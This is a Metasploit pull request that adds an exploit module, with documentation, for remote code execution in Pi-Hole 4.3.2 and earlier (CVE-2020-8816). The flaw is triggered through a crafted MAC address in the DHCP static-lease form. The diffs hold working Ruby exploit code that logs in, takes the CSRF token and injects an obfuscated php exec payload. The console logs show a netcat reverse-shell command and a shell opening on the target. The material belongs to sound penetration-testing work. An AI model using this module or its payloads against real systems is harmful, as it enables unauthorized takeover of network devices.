### PR TITLE
Pi-Hole < 4.3.3 dhcp static address RCE 

### DIFF
--- a/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md
+++ b/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md
@@ -49,6 +49,40 @@ other components were installed which are too new for it to work with.
 
 If you wish to install FTL, follow the [directions](https://docs.pi-hole.net/ftldns/compile/).
 
+### Setup (docker)
+
+```
+$ cat docker-compose.yml
+version: "3"
+
+# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
+services:
+  pihole:
+    container_name: pihole
+    image: pihole/pihole:4.3
+    ports:
+#      - "53:53/tcp"
+#      - "53:53/udp"
+#      - "67:67/udp"
+      - "80:80/tcp"
+#      - "443:443/tcp"
+    environment:
+      TZ: 'America/Chicago'
+      WEBPASSWORD: 'password123'
+    # Volumes store your data between container upgrades
+    #volumes:
+    #   - './etc-pihole/:/etc/pihole/'
+    #   - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
+    dns:
+      - 127.0.0.1
+      - 1.1.1.1
+    # Recommended but not required (DHCP needs NET_ADMIN)
+    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
+    cap_add:
+      - NET_ADMIN
+    restart: unless-stopped
+```
+
 ### Cleanup
 
 This will attempt to clean entries in `/etc/dnsmasq.d/04-pihole-static-dhcp.conf`.
@@ -74,28 +108,50 @@ Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to
 ### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04
 
   ```
-  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > exploit
+  msf5 > use exploit/unix/http/pihole_dhcp_mac_exec
+  [*] Using exploit/unix/http/pihole_dhcp_mac_exec
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888
+  lport => 8888
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set password password123
+  password => password123
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true
+  verbose => true
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > run
   
-  [*] Started reverse TCP double handler on 1.1.1.1:4444 
-  [*] Using cookie: PHPSESSID=gh6jsnqloiate3i03f61odtme2;
-  [*] Using token: kxpRSBAwsgqwoXLzNy+NJUIvxhZDg6XlgNpgFKWOa1g=
+  [+] mkfifo /tmp/wvfacoc; nc 1.1.1.1 8888 0</tmp/wvfacoc | /bin/sh >/tmp/wvfacoc 2>&1; rm /tmp/wvfacoc
+  [*] Started reverse TCP handler on 1.1.1.1:8888 
+  [+] Version Detected: 4.3
+  [*] Using cookie: PHPSESSID=4ce3tjd269lcut95orff4a45l8;
+  [*] Login required, attempting login.
+  [*] Using token: czTyD7HbrcwZfTS7gJg4xgxSkB/CjGNlJPTUueA0ACk=
+  [*] Validating path with MAC: 8D540FBF0F5F
   [+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-  [*] Payload MAC will be: 95F91DB49D89
+  [*] Payload MAC will be: 818CC59E2B82
+  [*] Shellcode: 818CC59E2B82&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("2f62696e2f6563686f202d6e6520275c7836645c7836625c7836365c7836395c7836365c7836665c7832305c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7833625c7832305c7836655c7836335c7832305c7833315c7833395c7833325c7832655c7833315c7833365c7833385c7832655c7833325c7832655c7833315c7833395c7833395c7832305c7833385c7833385c7833385c7833385c7832305c7833305c7833635c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7832305c7837635c7832305c7832665c7836325c7836395c7836655c7832665c7837335c7836385c7832305c7833655c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7832305c7833325c7833655c7832365c7833315c7833625c7832305c7837325c7836645c7832305c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c783632277c7368"));'&&
   [*] Sending Exploit
-  [*] Accepted the first client connection...
-  [*] Accepted the second client connection...
-  [*] Command: echo Sy32yxZq9xJIjYYz;
-  [*] Writing to socket A
-  [*] Writing to socket B
-  [*] Reading from sockets...
-  [*] Reading from socket A
-  [*] A: "Sy32yxZq9xJIjYYz\r\n"
-  [*] Matching...
-  [*] B is input...
-  [*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:52408) at 2020-05-16 01:04:42 -0400
-  [*] Attempting to clean D417DBC0B0BD from config
-  [*] Attempting to clean 95F91DB49D89 from config
+  [*] Command shell session 1 opened (1.1.1.1:8888 -> 2.2.2.2:40226) at 2020-05-28 09:50:18 -0400
+  [*] Attempting to clean 8D540FBF0F5F from config
+  [*] Attempting to clean 818CC59E2B82 from config
   
   id
   uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  uname -a
+  Linux ubuntu1804 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+  cat /etc/os-release
+  NAME="Ubuntu"
+  VERSION="18.04 LTS (Bionic Beaver)"
+  ID=ubuntu
+  ID_LIKE=debian
+  PRETTY_NAME="Ubuntu 18.04 LTS"
+  VERSION_ID="18.04"
+  HOME_URL="https://www.ubuntu.com/"
+  SUPPORT_URL="https://help.ubuntu.com/"
+  BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+  PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+  VERSION_CODENAME=bionic
+  UBUNTU_CODENAME=bionic
   ```

--- a/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md
+++ b/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md
@@ -1,0 +1,101 @@
+## Vulnerable Application
+
+This exploits a command execution in Pi-Hole <= 4.3.2. A new DHCP
+static lease is added with a MAC address which includes an RCE.
+DHCP server is not required to be running.
+
+Exploitation has many constraints, outlined in the original
+[technical writeup](https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/).
+
+1. Exploitation requires `/opt/pihole` to be first in the `$PATH` due to
+exploitation constraints.
+2. Payload must not contain `%00`
+3. Payload must be all capital letters
+
+### Setup
+
+Install Pi-Hole [Pi-Hole 4.3](https://github.com/pi-hole/pi-hole/releases/tag/v4.3)
+with the following commands:
+
+  ```
+  sudo git clone --depth=1 -b v4.3 https://github.com/pi-hole/pi-hole.git /etc/.pihole
+  # replace 'git clone' with 'git clone -b v4.3'
+  sudo nano /etc/.pihole/automated\ install/basic-install.sh
+  sudo ./basic-install.sh
+  ```
+
+Pi-Hole attempts to install the latest versions of the software.  Modifying the git clone
+command will force it to install the old AdminLTE and Pi-Hole versions.  However this
+will make FTL fail to install.
+
+Answer everything with the default.
+
+Lastly, we need to create one file which wasn't made.
+
+```
+sudo touch /etc/pihole/GitHubVersions
+```
+
+If `/opt/pihole` isn't in the path (for php/lighttp) because the install process wasn't 100% due
+to the forcing of version 4.3, edit `/etc/lighttpd/conf-available/15-fastcgi-php.conf` and
+add a new item to bin-environment.
+
+```
+"PATH" => "opt/pihole:" + env.PATH
+```
+
+This will be enough to make it exploitable, however the dashboard won't fully work since some
+other components were installed which are too new for it to work with.
+
+If you wish to install FTL, follow the [directions](https://docs.pi-hole.net/ftldns/compile/).
+
+### Cleanup
+
+This will attempt to clean entries in `/etc/dnsmasq.d/04-pihole-static-dhcp.conf`.
+However, on failure, `sudo pihole -a removestaticdhcp <MAC>` can be used to remove them.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/unix/http/pihole_dhcp_mac_exec```
+  4. Do: ```set rhosts```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Options
+
+### Password
+
+Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.
+
+## Scenarios
+
+### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04
+
+  ```
+  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > exploit
+  
+  [*] Started reverse TCP double handler on 1.1.1.1:4444 
+  [*] Using cookie: PHPSESSID=gh6jsnqloiate3i03f61odtme2;
+  [*] Using token: kxpRSBAwsgqwoXLzNy+NJUIvxhZDg6XlgNpgFKWOa1g=
+  [+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+  [*] Payload MAC will be: 95F91DB49D89
+  [*] Sending Exploit
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [*] Command: echo Sy32yxZq9xJIjYYz;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket A
+  [*] A: "Sy32yxZq9xJIjYYz\r\n"
+  [*] Matching...
+  [*] B is input...
+  [*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:52408) at 2020-05-16 01:04:42 -0400
+  [*] Attempting to clean D417DBC0B0BD from config
+  [*] Attempting to clean 95F91DB49D89 from config
+  
+  id
+  uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```

--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -1308,6 +1308,18 @@ class Exploit < Msf::Module
   end
 
   #
+  # Generate random hexadecimal characters avoiding the exploit's bad
+  # characters.
+  #
+  def rand_text_hex(length, bad=payload_badchars)
+    if debugging?
+      rand_text_debug(length, '0')
+    else
+      Rex::Text.rand_text_hex(length, bad)
+    end
+  end
+
+  #
   # Generate a random character avoiding the exploit's bad
   # characters.
   #

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  # include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -234,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Remote
           "AddHostname=#{rand_text_alphanumeric(3..8)}",
           'addstatic=',
           'field=DHCP',
-          "token=#{token}"
+          "token=#{URI.encode_www_form_component(token)}"
         ].join('&')
       )
 

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -1,0 +1,256 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  # include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pi-Hole DHCP MAC OS Command Execution',
+        'Description' => %q{
+          This exploits a command execution in Pi-Hole <= 4.3.2.  A new DHCP static lease is added
+          with a MAC address which includes an RCE.  Exploitation requires /opt/pihole to be first
+          in the $PATH due to exploitation constraints.  DHCP server is not required to be running.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'nateksec' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            ['URL', 'https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/'],
+            ['CVE', '2020-8816']
+          ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'Mar 28 2020',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse'
+        },
+        'Payload' => {
+          'BadChars' => "\x00"
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
+        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+        'method' => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
+
+      # vDev (HEAD, v4.3-0-g44aff72)
+      # v4.3
+      %r{<b>Web Interface Version\s*</b>\s*(vDev \(HEAD, )?v?(?<version>[\d\.]+)\)?.*<b>}m =~ res.body
+
+      if version && Gem::Version.new(version) <= Gem::Version.new('4.3.2')
+        vprint_good("Version Detected: #{version}")
+        return CheckCode::Appears
+      else
+        vprint_bad("Version Detected: #{version}")
+        return CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    CheckCode::Safe
+  end
+
+  def login(cookie)
+    vprint_status('Login required, attempting login.')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'tab' => 'piholedhcp'
+      },
+      'vars_post' => {
+        'pw' => datastore['PASSWORD']
+      },
+      'method' => 'POST'
+    )
+  end
+
+  def add_static(payload, cookie, token)
+    # we don't use vars_post due to the need to have duplicate fields
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => cookie,
+      'method' => 'POST',
+      'vars_get' => {
+        'tab' => 'piholedhcp'
+      },
+      'data' => [
+        'AddMAC=',
+        'AddIP=',
+        'AddHostname=',
+        "AddMAC=#{URI.encode_www_form_component(payload)}",
+        "AddIP=192.168.#{rand_text_numeric(1..2)}.#{rand_text_numeric(1..2)}",
+        "AddHostname=#{rand_text_alphanumeric(8..12)}",
+        'addstatic=',
+        'field=DHCP',
+        "token=#{URI.encode_www_form_component(token)}"
+      ].join('&')
+    )
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+
+    begin
+      @macs = []
+      # get cookie
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')
+      )
+      cookie = res.get_cookies
+      print_status("Using cookie: #{cookie}")
+
+      # get token
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
+        'cookie' => cookie,
+        'vars_get' => {
+          'tab' => 'piholedhcp'
+        }
+      )
+
+      # check if we got hit by a login prompt
+      if res && res.body.include?('Sign in to start your session')
+        res = login(cookie)
+      end
+
+      if res && res.body.include?('Sign in to start your session')
+        fail_with(Failure::BadConfig, 'Incorrect Password')
+      end
+
+      # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">
+      # may also include /
+      %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body
+
+      unless token
+        fail_with(Failure::UnexpectedReply, 'Unable to find token')
+      end
+      print_status("Using token: #{token}")
+
+      # from the excellent writeup about the vuln:
+      # The biggest difficulty in exploiting this vulnerability is that the user input is
+      # capitalized through a call to "strtoupper". Because of this, no lower case character
+      # can be used in the resulting injection.
+
+      # we'd like to execute something similar to this:
+      # aaaaaaaaaaaa&&php -r 'PAYLOAD'
+      # however, we need to pull p, h, and r from the system due to all input getting capitalized
+      # this is performed by pulling them from the $PATH which should be something like
+      # /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+      # first payload we send is to check that this is in the path to verify exploitation is possible
+      mac = rand_text_hex(12).upcase
+      @macs << mac
+      vprint_status("Validating path with MAC: #{mac}")
+      res = add_static("#{mac}$PATH", cookie, token)
+
+      # ruby regex w/ interpolate and named assignments needs to be in .match instead of =~
+      env = res.body.match(/value="#{mac}(?<env>.*)">/)
+      if env && env[:env].starts_with?('/opt/pihole')
+        print_good("System env path exploitable: #{env[:env]}")
+      else
+        msg = '/opt/pihole not in path. Exploitation not possible.'
+        if env
+          msg += " Path: #{env[:env]}"
+        end
+        fail_with(Failure::UnexpectedReply, msg)
+      end
+
+      # once we have php -r, we then need to pass a payload.  So we do this via php command
+      # exec on hex2bin since our payload in hex caps will still get processed and executed.
+
+      mac = rand_text_hex(12).upcase
+      @macs << mac
+      print_status("Payload MAC will be: #{mac}")
+      shellcode = "#{mac}&&" # mac address, arbitrary
+      shellcode << 'W=${PATH#/???/}&&'
+      shellcode << 'P=${W%%?????:*}&&'
+      shellcode << 'X=${PATH#/???/??}&&'
+      shellcode << 'H=${X%%???:*}&&'
+      shellcode << 'Z=${PATH#*:/??}&&'
+      shellcode << 'R=${Z%%/*}&&$'
+      shellcode << "P$H$P$IFS-$R$IFS'EXEC(HEX2BIN(" # php -r exec(hex2bin(
+      shellcode << '"'
+      shellcode << payload.encoded.unpack('H*').join('') # hex encode payload
+      shellcode << '"));'
+      shellcode << "'&&"
+
+      vprint_status("Shellcode: #{shellcode}")
+      print_status('Sending Exploit')
+      add_static(shellcode, cookie, token)
+
+      # we don't use vars_post due to the need to have duplicate fields
+      send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'cookie' => cookie,
+        'method' => 'POST',
+        'vars_get' => {
+          'tab' => 'piholedhcp'
+        },
+        'data' => [
+          'AddMAC=',
+          'AddIP=',
+          'AddHostname=',
+          "AddMAC=#{URI.encode_www_form_component(shellcode)}",
+          "AddIP=192.168.#{rand_text_numeric(1..2)}.#{rand_text_numeric(1..2)}",
+          "AddHostname=#{rand_text_alphanumeric(3..8)}",
+          'addstatic=',
+          'field=DHCP',
+          "token=#{token}"
+        ].join('&')
+      )
+
+    # entries are written to /etc/dnsmasq.d/04-pihole-static-dhcp.conf
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+
+  end
+
+  def on_new_session(session)
+    super
+    @macs.each do |mac|
+      print_status("Attempting to clean #{mac} from config")
+      session.shell_command_token("sudo pihole -a removestaticdhcp #{mac}")
+    end
+  end
+end

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => 'Mar 28 2020',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/reverse'
+          'PAYLOAD' => 'cmd/unix/reverse_netcat'
         },
         'Payload' => {
           'BadChars' => "\x00"

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'AddIP=',
         'AddHostname=',
         "AddMAC=#{URI.encode_www_form_component(payload)}",
-        "AddIP=192.168.#{rand_text_numeric(1..2)}.#{rand_text_numeric(1..2)}",
+        "AddIP=192.168.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}", #to_i to remove leading 0s
         "AddHostname=#{rand_text_alphanumeric(8..12)}",
         'addstatic=',
         'field=DHCP',
@@ -217,6 +217,8 @@ class MetasploitModule < Msf::Exploit::Remote
       add_static(shellcode, cookie, token)
 
       # we don't use vars_post due to the need to have duplicate fields
+      ip = '192.168'
+      2.times {ip="#{ip}.#{rand_text_numeric(1..2).to_i}"} #to_i removes leading zeroes
       send_request_cgi(
         'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
         'ctype' => 'application/x-www-form-urlencoded',
@@ -230,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'AddIP=',
           'AddHostname=',
           "AddMAC=#{URI.encode_www_form_component(shellcode)}",
-          "AddIP=192.168.#{rand_text_numeric(1..2)}.#{rand_text_numeric(1..2)}",
+          "AddIP=192.168.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}", #to_i to remove leading 0s
           "AddHostname=#{rand_text_alphanumeric(3..8)}",
           'addstatic=',
           'field=DHCP',

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
 


### PR DESCRIPTION
This adds the last of 3 Pi-Hole exploit modules.  While there are many versions of overlap between this one and the 4.4 one, the benefit here is that a port 80 inbound connection isn't required.  This may help in some cases for exploitation.

This module exploits the DHCP server portion when adding a static reservation.  The DHCP server doesn't need to be running.  There are many constraints on exploitation, if you're interested read the original vuln writeup, it's pretty awesome how the author made it happen.

Also added `rand_text_hex`, it was already in `rex.text`, and I needed it for random MAC addresses.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/http/pihole_dhcp_mac_exec`
- [ ] `set rhosts/lhost/lport`
- [ ] **Verify** you get a userland shell
- [ ] **Document** spelling and grams looks bueno

